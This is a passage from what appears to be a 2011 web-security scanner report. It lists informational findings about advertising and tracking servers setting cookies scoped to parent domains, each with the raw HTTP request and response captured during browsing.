GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=28134&adId=23480&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c&frameName=http_ad_doubleclick_netadiamzn_us_house_redirect;cid=pubmatic728;sz=728x90;click=http_bes-clck_comckomli_ads_frame12527328134&kltstamp=2011-7-15%2013%3A26%3A1&ranreq=0.7707217440474778&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbtYQ9ait5Dn-YTEFyZnCYtfUfXf9zFfSEFBpO03suLL9pqQrZ.yPdj7Vob1aS6PK7Rz5sf0iu3Qrn4mv2.cpSP7BomB8.h08ZhdCEsUwfYSc96kHdEjUXzR1tVBiwV1v4xdxmYQQkw8r8z0lh-uT1kJQV0aRH9qsW2jEF17Dev9Ywuhsc.h0a7FWcsNTtsxKJ6JifJjW2zg3jpTc9fDaHDpzVElI51j-BRyXBFXF2RayGvWR0e8O1yqI5oa9NvPbS-9CplZHeUV1cXCv0lqVKT1sPyXU5tiwJtw0GXQtdQVHKBae4OFtZ2oITbUYAl3wNrulDLb2LC5.FmjL4dBOfZe9xl8H3Y7e-DR5uQ0FCTupDmD2IQCgxZs4E-pKqkXGMOGATFnu5gpufNXilJXNDzTuXcAQjDEq-tdWU7CpQti0E7AOVccWwMf1V0GY891kDHcdd7pJLtl9aw0_&d=;ord=4,525,044,809,135,282,754?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBMDCID=1; pubfreq_25281=; pubtime_25281=TMC; _curtime=1313432692; pubfreq_25281_19972_345442688=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:26:23 GMT
Content-Length: 1747
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:23 GMT; path=/
Set-Cookie: _curtime=1313432783; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:36:23 GMT; path=/
Set-Cookie: pubfreq_28134_23480_2032421322=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:23 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:23 GMT; path=/

document.write('<div id="http_ad_doubleclick_netadiamzn_us_house_redirect;cid" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAOZtAAC4WwAA3
...[SNIP]...

12.40. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A42%3A18&ranreq=0.9575279243290424&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; PUBMDCID=1; _curtime=1313432705; PMDTSHR=cat:; KTPCACOOKIE=YES; pubfreq_25281=243-1; pubfreq_28134=243-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1645
Date: Mon, 15 Aug 2011 18:41:24 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:24 GMT; path=/
Set-Cookie: _curtime=1313433684; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:24 GMT; path=/
Set-Cookie: pubfreq_25281_19972_471124789=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:24 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:24 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...

12.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=28134&adId=23480&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c&frameName=http_ad_doubleclick_netadiamzn_us_house_redirect;cid=pubmatic728;sz=728x90;click=http_bes-clck_comckomli_ads_frame12527328134&kltstamp=2011-7-15%2013%3A42%3A31&ranreq=0.3122092674020678&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; _curtime=1313432705; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES; KRTBCOOKIE_148=1699-uid:429524AE883F3F4E0C1F6D2B02EBB920; KRTBCOOKIE_16=226-uid:3574436734868397339; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 2301
Date: Mon, 15 Aug 2011 18:41:37 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:36 GMT; path=/
Set-Cookie: _curtime=1313433697; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:37 GMT; path=/
Set-Cookie: pubfreq_28134_23480_1567451806=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:37 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:37 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

12.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1723
Date: Mon, 15 Aug 2011 18:26:04 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:03 GMT; path=/
Set-Cookie: pubfreq_25281_19972_1780682826=661-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:04 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:04 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...

12.43. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=4&mt_ec=64ws&mt_exuid=CAESEPn5uWsxF0NimWaur9X3LMg&cver=1 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e394114-5150-5bce-73fa-628197421391; ts=1313432696; mt_mop=13:1312375063|4:1313433698|10008:1313433698

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f47 32583
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 15 Aug 2011 18:41:44 GMT
Connection: Keep-Alive
Set-Cookie: ts=1313433704; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:41:44 GMT
Set-Cookie: mt_mop=4:1313433704|10008:1313433698|13:1312375063; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:41:44 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

12.44. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=217944569&migRandom=684517331&migTagDesc=Cingular&migAtlSA=286369565&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=211111708350353; path=/; expires=Sat, 08-Sep-12 18:24:16 GMT; domain=.mookie1.com
Set-Cookie: mdata=1|211111708350353|1313102888; path=/; expires=Sat, 08-Sep-12 18:24:16 GMT; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

12.45. http://tags.bluekai.com/site/2736  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2736

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2736 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99JRcc6fbvHWp; bko=KJpEWVjQSnmN2tBAAmPMRJMT653wCDWupQ/9PDys9x==; bkw5=KJpMLV/9QCL1JT9A1TMJy1Myk6zZQjaOW6ZsWuTMozf/R/9AyyvU6UJQjsQs0MY0l/Yv/z+Ttun61vsR8ZRwR3wg9zZLX9P0asXpYviehvqbQACmngzsOGSt/ahboGqCzQW9tmL5kx==; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1pdDQUwy9bB9E0; bklc=4e48bee4; bk=BY24Lyv8mq65PvUy; bkc=KJh56nNn96WxO4YlXRpZut/gGrecYRWDPGWziHaWR7w5SD9ax4sdY9COHx+OA9iZE3BkvADBogYy+nBxOs6DYbtWQ1sjMV+rDC6dfLtIlSZcQP9evsTLr9o97U0UkabhmgTAV8uFjsqz9BTEfB6hSzTqhbJ9vb8yAZgwLfIe6oylwGG9yUbaNIFXF8wEWmSXzRMbnGbOpapcB0UoIuNodC3dhxYF3gOe2INO0VS4f6mRIThc0/PJC5+XM+blB1MILYc1KK1s2DPoUbz6pllLqWuSXXqgzqodDbcLXdQZCekFdWwfsN8Emwh03m2Jm8sEFgvk7NLv08ImSIaaKtCvI78YK7Rwy+pF2IBOmhXQByK9NxKa+cSF53cncgljqpfwZaSJqOa/IqyRkFSbpwwsjduFP3w22/l3dqY5qVZ2Fpdd9ZY0ZA6=; bkst=KJykMpNmQpW1CMB6Q7TuDMLpLPgWErpWxXUxuGeD5Zaidw/lLMa0YteQYJyOQzHjVnQaiUQ70IXMw4qY4J0R7o42fUaCFF3XB+LetwIQJlVAx4YoMwbf2hzZSlejpQaSGxyI1613PGOnJOJshjEKBNK54pT54wEGD3AvjaUOrfkO/FxxVbtHSb1GIwB86dkoSzpvmcR3nmoacqJRDUAnxlXIsq16/74qrnXIwM00U+fFIF8lsCgh/UOsQ5yTQx2S/ujnDOO7/ZtNJndjeD6IstIuoVyMi6+RvwC/iFpSpdTeKlz2Rx==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:53 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 16 Aug 2011 18:45:53 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=CYb209v8mq65PvUy; expires=Sat, 11-Feb-2012 18:45:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWDOdeFczXyFputWZv1Zo3aNjEUMacut1pr1RDiDFb/vEDCaA3JsZLqBkmp/MISVPYV5CSAtJ9avpPkzLTqNlF7gPb4lF4zfft7WQHrSXeut7HK9Six0hTwhvE7ez4U8W95vvTTFA+vzNffQZhxdiQ27F4CwzcKsoEZFcRAeeuMYrPDS8f2fj4ZFwjIYwOlvghK84b5c/Dy8fDeNc5IYvx7c55v6kwg6FpP4GL9NgcYJ+tleSDTItycy+07lDzreYFz8nn6F+kr2AzzyopUgkB4ZwjNxFwzhXbWoeZFFH0kIpzDekyKVGDy8fPdScI2iyofU0qNw5kmjvDFT2nwERV8EpBFT1PtpTM64DhbRCFYlmdtTtTgf01lrGYaOTDhtIttYh8q2sSlIEh+ViD0HuekXAhxtFvR8fPwbPINuFFobn4lypRloml2d4AUOt3ZH9==; expires=Sat, 11-Feb-2012 18:45:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 16-Aug-2011 18:45:53 GMT; path=/; domain=.bluekai.com
BK-Server: 24b6
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.46. http://tags.bluekai.com/site/2751  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2751

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2751?id=CM-00000001429329761 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
